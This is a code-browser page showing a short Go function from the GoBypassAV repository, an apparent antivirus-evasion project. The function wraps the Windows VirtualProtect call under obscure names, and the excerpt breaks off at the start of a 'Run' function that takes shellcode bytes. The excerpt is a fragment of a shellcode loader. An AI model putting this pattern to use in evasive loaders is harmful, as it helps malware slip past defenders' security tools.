MCPcopy Create free account
hub / github.com/TideSec/GoBypassAV / aaa

Function aaa

SandBox/main.go:179–186  ·  view source on GitHub ↗
(a unsafe.Pointer, b uintptr, c uint32, d unsafe.Pointer)

Source from the content-addressed store, hash-verified

177var VirtualAlloc = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
178
179func aaa(a unsafe.Pointer, b uintptr, c uint32, d unsafe.Pointer) bool {
180 ret, _, _ := VirtualAlloc.Call(
181 uintptr(a),
182 uintptr(b),
183 uintptr(c),
184 uintptr(d))
185 return ret > 0
186}
187
188func Run(sc []byte) {
189 fly := func() {}

Callers 1

RunFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected